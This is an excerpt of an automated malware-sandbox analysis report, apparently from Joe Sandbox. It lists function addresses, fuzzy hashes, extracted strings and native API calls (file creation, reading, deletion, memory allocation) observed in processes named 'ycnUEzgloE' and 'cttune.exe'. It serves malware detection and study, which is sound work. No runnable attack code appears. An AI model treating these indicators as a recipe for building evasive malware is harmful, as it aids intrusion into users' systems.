Opcode Fuzzy Hash: a307b9234a7a76751f8ef33bf905eb7db0baf455417a6ac040e8c5995451c3c1
Instruction Fuzzy Hash: 83C08CB2A003087FEB44EF8CCC86FA633DCDB08610F044090BA0C8B381E9B1F9508BA5

Function 04C02FEF Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d509ca43d6815dcd3aa86ede2a7558fb3e168c5e368c19e8bc8362a6e5d526
Instruction ID: c25c070070f2f4eb006cf98a6b92126735edafdffeae23598f85f5799602dc80
Opcode Fuzzy Hash: 33d509ca43d6815dcd3aa86ede2a7558fb3e168c5e368c19e8bc8362a6e5d526
Instruction Fuzzy Hash: 53C08C72240400998B0276A8EBE581E3722F5CB1943944589E8014E18BE6A06C403482

Non-executed Functions

Function 04C02720 Relevance: 41.3, Strings: 33, Instructions: 6COMMON

Download Yara Rule

Strings

&, xrefs: 04C028AE
"O, xrefs: 04C027AA
r=, xrefs: 04C0282A
wq, xrefs: 04C02853
oG, xrefs: 04C02960
px, xrefs: 04C028BC
T(, xrefs: 04C0276E
0, xrefs: 04C02908
3f, xrefs: 04C0292E
@, xrefs: 04C028F4
{p, xrefs: 04C02804
}?, xrefs: 04C02782
F~, xrefs: 04C029CC
LP, xrefs: 04C0294B
z, xrefs: 04C027E6
,H, xrefs: 04C027DC
/B, xrefs: 04C0296E
Z, xrefs: 04C0299A
}, xrefs: 04C0286E
K%, xrefs: 04C027C8
}, xrefs: 04C027D2
*2, xrefs: 04C02831
Y<, xrefs: 04C02A9E
R, xrefs: 04C02A0B
[, xrefs: 04C02A29
E, xrefs: 04C02A6F
(, xrefs: 04C02838
R, xrefs: 04C02927
3:, xrefs: 04C02764
g, xrefs: 04C02919
`, xrefs: 04C0297C
J, xrefs: 04C029AE
HZ, xrefs: 04C02944

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: `$"O$&$*2$,H$/B$0$3:$3f$@$E$F~$HZ$J$K%$LP$R$R$T($Y<$Z$[$g$oG$px$r=$wq${p$}?$($z$}$}
API String ID: 0-4116312656
Opcode ID: b3f7eed8f5cb2ffe54a7ab02dc71ef2f98f0a1da7e949afdc2b1937c95ba49a7
Instruction ID: e262d379c905b1babce68c7f982d6ed672ae824dced3a763e406ba34fb1c0298
Opcode Fuzzy Hash: b3f7eed8f5cb2ffe54a7ab02dc71ef2f98f0a1da7e949afdc2b1937c95ba49a7
Instruction Fuzzy Hash: 9D900413D03C344C05174C1015735013C4741C54C1303D511CC147F414DD77C4534440

Function 04C1AAB9 Relevance: 34.0, Strings: 27, Instructions: 264COMMON

Download Yara Rule

Strings

), xrefs: 04C1AB01
), xrefs: 04C1AB5B
u, xrefs: 04C1AB33
g, xrefs: 04C1AB29
i, xrefs: 04C1AD5B
}, xrefs: 04C1AB1F
F, xrefs: 04C1AB96
$, xrefs: 04C1AB15
%, xrefs: 04C1AC9F
urlmon.dll, xrefs: 04C1ACFB, 04C1ACFE
., xrefs: 04C1AD54
>, xrefs: 04C1AAF7
T, xrefs: 04C1ABA4
B, xrefs: 04C1ABCE
F, xrefs: 04C1AB81
}, xrefs: 04C1AB3D
m, xrefs: 04C1AB6C
E, xrefs: 04C1AB7A
s, xrefs: 04C1AB47
h, xrefs: 04C1AAE3
Q, xrefs: 04C1AB8F
H, xrefs: 04C1AB88
w, xrefs: 04C1AB73
v, xrefs: 04C1AAED
$, xrefs: 04C1AB51
5, xrefs: 04C1AB65
J, xrefs: 04C1ABD5

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
API String ID: 0-1002149817
Opcode ID: 541954ebf01608486da5eb2114e1f4e8e4fdb73ce3c27f4993d6cecc0cdc86b5
Instruction ID: 8c8a3482b7fe5984b9744108696875598c8b4343ab261c288b7ad2ca71f661ed
Opcode Fuzzy Hash: 541954ebf01608486da5eb2114e1f4e8e4fdb73ce3c27f4993d6cecc0cdc86b5
Instruction Fuzzy Hash: DCC150B1D01268AEEF20DFA4CD44BDEBBB9AF05304F0081D9D54CAB251E7B55A88DF61

Function 04C1318D Relevance: 16.4, Strings: 13, Instructions: 197COMMON

Download Yara Rule

Strings

F, xrefs: 04C13240
m, xrefs: 04C13239
i, xrefs: 04C131FA
l, xrefs: 04C13247
r, xrefs: 04C13232
s, xrefs: 04C1324E
P, xrefs: 04C13224
o, xrefs: 04C13208
, xrefs: 04C131F3
e, xrefs: 04C13201
., xrefs: 04C131CA
x, xrefs: 04C131D4
o, xrefs: 04C1322B

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 71c96618d3c0f5e457e04ec17911457d798a02ce671959b3baa9a722cac25539
Instruction ID: 1b92327888e3e33088ecfea1fbb851c294cdb58f47525bd4fc06ffe5e164d8e4
Opcode Fuzzy Hash: 71c96618d3c0f5e457e04ec17911457d798a02ce671959b3baa9a722cac25539
Instruction Fuzzy Hash: 777153B1810328AAEB55EFA4CC40FDEB77DBF48704F008299E519A6150EBB56788DF61

Function 04C13199 Relevance: 16.4, Strings: 13, Instructions: 194COMMON

Download Yara Rule

Strings

F, xrefs: 04C13240
m, xrefs: 04C13239
i, xrefs: 04C131FA
l, xrefs: 04C13247
r, xrefs: 04C13232
s, xrefs: 04C1324E
P, xrefs: 04C13224
o, xrefs: 04C13208
, xrefs: 04C131F3
e, xrefs: 04C13201
., xrefs: 04C131CA
x, xrefs: 04C131D4
o, xrefs: 04C1322B

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 26562612066def6eb7f03dc860ee98daca9775b4a502641a09a136d1abc1c4be
Instruction ID: 463d9ed14c3f3ba0185e84162e54d940ba962c481314009fe5ea89cc768409dd
Opcode Fuzzy Hash: 26562612066def6eb7f03dc860ee98daca9775b4a502641a09a136d1abc1c4be
Instruction Fuzzy Hash: 3C7134B1C00368AAEB55DFA4CC40FDE777DBF48704F008299E519A6150EBB56788DFA1

Function 04C06E35 Relevance: 13.8, Strings: 11, Instructions: 86COMMON

Download Yara Rule

Strings

w, xrefs: 04C06EC6
l, xrefs: 04C06E74
r, xrefs: 04C06E82
e, xrefs: 04C06E89
x, xrefs: 04C06E6D
i, xrefs: 04C06ED4
r, xrefs: 04C06E7B
D, xrefs: 04C06EBF
\, xrefs: 04C06E66
e, xrefs: 04C06E90
n, xrefs: 04C06ECD

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: d5b5f6912201110b953e0d0146e5aec28c3b8c7f3b4f3138d80f86334e957d39
Instruction ID: f4013940e8a214f18ea98e8bc188179c42f58a8725735ad3f042c72e9cfa8c46
Opcode Fuzzy Hash: d5b5f6912201110b953e0d0146e5aec28c3b8c7f3b4f3138d80f86334e957d39
Instruction Fuzzy Hash: 903185B1D10218AEEF50DFE4CC45BEEB7B9BF08704F10815DE618BA180DBB52648CBA5

Function 04BFF439 Relevance: 11.3, Strings: 9, Instructions: 43COMMON

Download Yara Rule

Strings

^, xrefs: 04BFF487
&, xrefs: 04BFF45B
q, xrefs: 04BFF483
*, xrefs: 04BFF46F
Q, xrefs: 04BFF467
", xrefs: 04BFF44B
4, xrefs: 04BFF45F
(, xrefs: 04BFF44F
_, xrefs: 04BFF477

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: "$&$($*$4$Q$^$_$q
API String ID: 0-1346481440
Opcode ID: 550f6009e5f1eb31ee448c71cecc5dac8e23b0afcd46bbfa7319254a16cc649b
Instruction ID: ed05729c41c462084fa2ab3fc1c6ec7aefb78e7234fe65613a457f63e860fc4e
Opcode Fuzzy Hash: 550f6009e5f1eb31ee448c71cecc5dac8e23b0afcd46bbfa7319254a16cc649b
Instruction Fuzzy Hash: C611DE10D083CADADB12C7BC98082AEBF715F13224F0882D9D5E42B2D3D2B95349C7A2

Function 04C0E2D2 Relevance: 10.1, Strings: 8, Instructions: 135COMMON

Download Yara Rule

Strings

x, xrefs: 04C0E312
m, xrefs: 04C0E3E0
., xrefs: 04C0E30B
e, xrefs: 04C0E3EE
P, xrefs: 04C0E3C2
r, xrefs: 04C0E3D6
o, xrefs: 04C0E3CC
i, xrefs: 04C0E3E7

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: 3a63fb7fa01495dc99999e57b6a8d82a998f1c10a3b96bbc19625b708d8bb1ea
Instruction ID: 3f88b31ccb18d56d5dfeef377c625497873afc1b678c1e5bfce97e9d7fdf7cd7
Opcode Fuzzy Hash: 3a63fb7fa01495dc99999e57b6a8d82a998f1c10a3b96bbc19625b708d8bb1ea
Instruction Fuzzy Hash: 8841A9B5800268BBEB24EFB0DD44FDE737DAF14304F008599A90967150E7F567489FA1

Function 04C1B319 Relevance: 8.9, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

e, xrefs: 04C1B3A5
l, xrefs: 04C1B390
\, xrefs: 04C1B3DE
c, xrefs: 04C1B389
S, xrefs: 04C1B397
a, xrefs: 04C1B39E
L, xrefs: 04C1B382

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: L$S$\$a$c$e$l
API String ID: 0-3322591375
Opcode ID: 73139295b321cbef769674eca2557e84bf6f5685ff342f3eccfffcac8873a82c
Instruction ID: 1a06957ea46c9ede89a94f8a0bcd9ffaefa864ce2263aec790e61efe551d9b80
Opcode Fuzzy Hash: 73139295b321cbef769674eca2557e84bf6f5685ff342f3eccfffcac8873a82c
Instruction Fuzzy Hash: 034174B2C00218EADF10DFA4DC84BEEB7F9BF48314F45415AE90DAB210E7B56A459F90

Function 04C12F4B Relevance: 7.7, Strings: 6, Instructions: 179COMMON

Download Yara Rule

Strings

f, xrefs: 04C12FBC
F, xrefs: 04C12FAE
P, xrefs: 04C12F92
x, xrefs: 04C12FC3
r, xrefs: 04C12FB5
T, xrefs: 04C12F99

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: F$P$T$f$r$x
API String ID: 0-2523166886
Opcode ID: d8d19e164601a541491fa42cf592630182ecf094c2bd9e7475bcbf116406037a
Instruction ID: 7b539ff180478d5f05497ad457d908a32fa532a0006170032f938d1ce4149b8f
Opcode Fuzzy Hash: d8d19e164601a541491fa42cf592630182ecf094c2bd9e7475bcbf116406037a
Instruction Fuzzy Hash: E35118B1900354ABF734DBA4CD44BEAF7F9FF05308F00459EA909661A0DBB8B644DB91

Function 04C12655 Relevance: 6.5, Strings: 5, Instructions: 205COMMON

Download Yara Rule

Strings

i, xrefs: 04C126A4
, xrefs: 04C1268F
o, xrefs: 04C1269D
l, xrefs: 04C126AB
u, xrefs: 04C12696

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: 2bf44b918d66c2213359a7fc366c5617fbe649ebfc29bdd331691513c3d816dc
Instruction ID: c17344ce3d6ab83b37fa5941777106464bcf8847b33503613f25f771ff368712
Opcode Fuzzy Hash: 2bf44b918d66c2213359a7fc366c5617fbe649ebfc29bdd331691513c3d816dc
Instruction Fuzzy Hash: DA717CB6900304AFDB25DFA4CC80FEFB7FAAB49300F104599E519A7240E735BA05DBA0

Function 04C12659 Relevance: 6.4, Strings: 5, Instructions: 126COMMON

Download Yara Rule

Strings

i, xrefs: 04C126A4
, xrefs: 04C1268F
o, xrefs: 04C1269D
l, xrefs: 04C126AB
u, xrefs: 04C12696

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: 880fcb7be5f565dcac4fe00b50a826f7bfa1f522dc781594da91d25fea6b46a2
Instruction ID: 9e14c876079a96c91b245c459df9a0ecb2739ea699a62c3e0c64011cb872e99d
Opcode Fuzzy Hash: 880fcb7be5f565dcac4fe00b50a826f7bfa1f522dc781594da91d25fea6b46a2
Instruction Fuzzy Hash: 95414CB5900308AFDB24DFA4CC84FEFBBF9EF49704F104559E619A7240E770AA459BA0

Function 04C0E4B9 Relevance: 6.3, Strings: 5, Instructions: 88COMMON

Download Yara Rule

Strings

1, xrefs: 04C0E58A
c, xrefs: 04C0E583
-, xrefs: 04C0E598
6, xrefs: 04C0E591
-, xrefs: 04C0E57C

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: -$-$1$6$c
API String ID: 0-1819861939
Opcode ID: 8270341f8197d77718ea3d26c070b8992eab9808802a4e9d8f9e3169dd733b69
Instruction ID: 2f86ecd8e87c39ec546fe00e1e89b0030aa8c3df95b38757202dd786909b9e2e
Opcode Fuzzy Hash: 8270341f8197d77718ea3d26c070b8992eab9808802a4e9d8f9e3169dd733b69
Instruction Fuzzy Hash: 143150B1D10119BBEB00DFA4DD45BEE77BDAF04308F048599E904A7280EBB5AB458BE5

Function 04C122E9 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

o, xrefs: 04C1231F
k, xrefs: 04C12326
e, xrefs: 04C1232D
, xrefs: 04C12318

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 2cb7fe61f88d92105799bd34021e942e4b16cad5b293dc5e56def55366951134
Instruction ID: 26feacc62759940473fae61950d7bdc4eaabba04a847394c4e1971a3d26af49a
Opcode Fuzzy Hash: 2cb7fe61f88d92105799bd34021e942e4b16cad5b293dc5e56def55366951134
Instruction Fuzzy Hash: 45B10BB5A00208AFDB24DBA4DC84FEFB7F9AF88704F108559F619A7240DA74AB419B50

Function 04C12C21 Relevance: 5.2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

Strings

h, xrefs: 04C12CFC
e, xrefs: 04C12D0A
o, xrefs: 04C12D03
, xrefs: 04C12CF5

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: 88da6b10e99df7e01ec516ee8a5b368904672a076be8a73b5433f2ecb27538bc
Instruction ID: e3a69953c909bf2158a98c25893b9ce8187e6d6a3372d6e7e118abfdcdb21b19
Opcode Fuzzy Hash: 88da6b10e99df7e01ec516ee8a5b368904672a076be8a73b5433f2ecb27538bc
Instruction Fuzzy Hash: DC8178B2C011186AFB54DBA4CC85FEF73BDEF49704F004699E509A6150EF746B889FA1

Function 04C121A6 Relevance: 5.1, Strings: 4, Instructions: 121COMMON

Download Yara Rule

Strings

FALSETRUE, xrefs: 04C12251, 04C12254
FALSETRUE, xrefs: 04C12229, 04C1222E
TRUE, xrefs: 04C12213, 04C12216
TRUE, xrefs: 04C122A6

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: d8214a9cf2ea80b0d8a67e9b32dcbc0497bc5a82a28f0ecd339dd9361cd4f9d3
Instruction ID: 2a77ff3285493a49f9b3f17d29cab8e64f20dc46205ff928a622282180679d7d
Opcode Fuzzy Hash: d8214a9cf2ea80b0d8a67e9b32dcbc0497bc5a82a28f0ecd339dd9361cd4f9d3
Instruction Fuzzy Hash: 8B419E75900168BEEB01EBA4CD41FFF773DAF86A14F004049FA00AA290E7F8660197E6

Function 04C121A9 Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

FALSETRUE, xrefs: 04C12251, 04C12254
FALSETRUE, xrefs: 04C12229, 04C1222E
TRUE, xrefs: 04C12213, 04C12216
TRUE, xrefs: 04C122A6

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
API String ID: 0-2877786613
Opcode ID: 3bbeb9818edc0d0f8c8f2512eeabb356b2846fdc2a6677c543608dcd44457ffa
Instruction ID: bca9047d511e0b49cd990ab28df3adbbf01c1b307f9c088d2525569d157562f6
Opcode Fuzzy Hash: 3bbeb9818edc0d0f8c8f2512eeabb356b2846fdc2a6677c543608dcd44457ffa
Instruction Fuzzy Hash: 96319275911168BEF701EBA5CC41FEF777DAF46A14F004049FA00AA290E7F8760197E6

Function 04C12C29 Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

h, xrefs: 04C12CFC
e, xrefs: 04C12D0A
o, xrefs: 04C12D03
, xrefs: 04C12CF5

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: $e$h$o
API String ID: 0-3662636641
Opcode ID: d36077c8f6e7955ecafd1411ea395bf1a92aa0cd60b57fc22452d4121fc4a1b2
Instruction ID: ff8d2fcd52941c979afd8a13f377a645c07ac511c7ade97907c93f863a09672c
Opcode Fuzzy Hash: d36077c8f6e7955ecafd1411ea395bf1a92aa0cd60b57fc22452d4121fc4a1b2
Instruction Fuzzy Hash: AA4173B1C01228AAFB54DBA4CC45FEFB3BDEF44704F008199E508A6150EBB46B848FA1

Function 04C1D7C9 Relevance: 5.1, Strings: 4, Instructions: 58COMMON

Download Yara Rule

Strings

@=&, xrefs: 04C1D7D8, 04C1D7FA
@=&, xrefs: 04C1D850, 04C1D853
pB @=&, xrefs: 04C1D840, 04C1D845
pB, xrefs: 04C1D811

Memory Dump Source

Source File: 0000000A.00000002.3289400081.00000000048E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 048E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_48e0000_ycnUEzgloE.jbxd

Yara matches

Similarity

API ID:
String ID: @=&$ @=&$pB$pB @=&
API String ID: 0-404702418
Opcode ID: d7ac2541afaaba39f59b5036947611f199d02fadde8bd42f80703d6a2675938e
Instruction ID: 8101f6cf99118e5d3cbc836601c35bb9aa294d42f7335ff4396bed17c3e85426
Opcode Fuzzy Hash: d7ac2541afaaba39f59b5036947611f199d02fadde8bd42f80703d6a2675938e
Instruction Fuzzy Hash: CF11CEF1D0121DAF9B04DF98D8819EFBBF9EF48200F14815AE919E7240E770AA15CFA0

Analysis Process: cttune.exePID: 6948, Parent PID: 1896COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	1.6%
Total number of Nodes:	442
Total number of Limit Nodes:	72

Executed Functions

Function 00A8C870 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 00A8C954
FindNextFileW.KERNELBASE(?,00000010), ref: 00A8C98F
FindClose.KERNELBASE(?), ref: 00A8C99A

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: b3f0d38b4034c888d0ee3e074ceaa34372b226b920d7ac17fb6b8d6c2f47323a
Instruction ID: f4c1a7a0ff4b8ddc34ab43777e176615e23a5b52fd571e655d174c3c62dba55b
Opcode Fuzzy Hash: b3f0d38b4034c888d0ee3e074ceaa34372b226b920d7ac17fb6b8d6c2f47323a
Instruction Fuzzy Hash: 3C3143B2A002087BDB20EFA4CD85FFF77BC9F44714F144599F918A7181DA74AA85CBA0

Function 00A99330 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,6A84A4CD,?,?,?,?,?,?,?), ref: 00A99425

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4afebb0a094bc7a73d8c7bc665e2dc52731ec6d75df0ba5ad104457950258b61
Instruction ID: 2f795fcf887ed6d39ed9f3eb739416780b199d5c4c72951c5ea63cdc22bb7e6f
Opcode Fuzzy Hash: 4afebb0a094bc7a73d8c7bc665e2dc52731ec6d75df0ba5ad104457950258b61
Instruction Fuzzy Hash: 0031D4B5A11248AFDB14DF98D981EEFBBF9EF88300F108119F918A7344D730A841CBA5

Function 00A99490 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,6A84A4CD,?,?,?,?,?), ref: 00A9956D

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1546d33ac782e5135d90267b4d8d30400cd7bd0890a31838246d027e4bc65b3c
Instruction ID: 7dee398886613cdb2167d5799845f5d5e2ecead8b916065a30e906237e65d889
Opcode Fuzzy Hash: 1546d33ac782e5135d90267b4d8d30400cd7bd0890a31838246d027e4bc65b3c
Instruction Fuzzy Hash: CA31E5B5A10208AFDB14DF99D881EEFB7F9EF88300F10811AF918A7245D770A911CBA5

Function 00A99770 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00A8204B,?,00A9819F,6A84A4CD,00000004,00003000,?,?,?,?,?,00A9819F,00A8204B,?,?,00A9B651), ref: 00A9982C

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b525c5235d04267fda64a0dfec9f9cbabd5f77f8025979c30463ef53a727c7e1
Instruction ID: 4eac775b171445116003f18d1708c187ae1b13112e968a4f1851b6814bebe7fe
Opcode Fuzzy Hash: b525c5235d04267fda64a0dfec9f9cbabd5f77f8025979c30463ef53a727c7e1
Instruction Fuzzy Hash: 40212EB5A10249AFDB10DF98DC41EEFB7B9EF88700F10810AFD18A7245D770A951CBA5

Function 00A99580 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 00A9960A

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 530c8a5737b2f286417010fde17f045dd0a14b14d7af6a76751485b30b7dd710
Instruction ID: c56df098d15fb00009b3dd92fae039500b18dee21e1bc543e714d89098986d96
Opcode Fuzzy Hash: 530c8a5737b2f286417010fde17f045dd0a14b14d7af6a76751485b30b7dd710
Instruction Fuzzy Hash: 54117371A106047AD620EBA9DC42FAFB7ACDF85710F40810AFA189B281DB75B546CBE5

Function 00A99620 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00A99654

Memory Dump Source

Source File: 0000000B.00000002.3288064284.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_a70000_cttune.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction ID: ccf8e5bf6309894d18d7e4e00339926775b339a153f34b6c02ddeb9832b77dcc
Opcode Fuzzy Hash: 6ccdd4b3c537907601f230bce43c5b9176195eb5b89fb8544d878d0038bffd2d
Instruction Fuzzy Hash: 93E046326102147BE620AA69DC42FDB77ACEFC5760F40C415FA0CA7282CA70B9128BF0

Function 04AB35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB35CA

Memory Dump Source

Source File: 0000000B.00000002.3290150361.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true

Associated: 0000000B.00000002.3290150361.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3290150361.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4a40000_cttune.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a8a804ac5874ddf2313f431321a0bde1341a80837b8e34073b63971118c76133
Instruction ID: 474021499252e38453242199d3f3c309bda27ae75c4fdf430d281f4838030e4d
Opcode Fuzzy Hash: a8a804ac5874ddf2313f431321a0bde1341a80837b8e34073b63971118c76133
Instruction Fuzzy Hash: 9590023160550402F1407159451470610059BD0206FA6C419A0425568D879ADA5165A2

Function 04AB4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AB465A

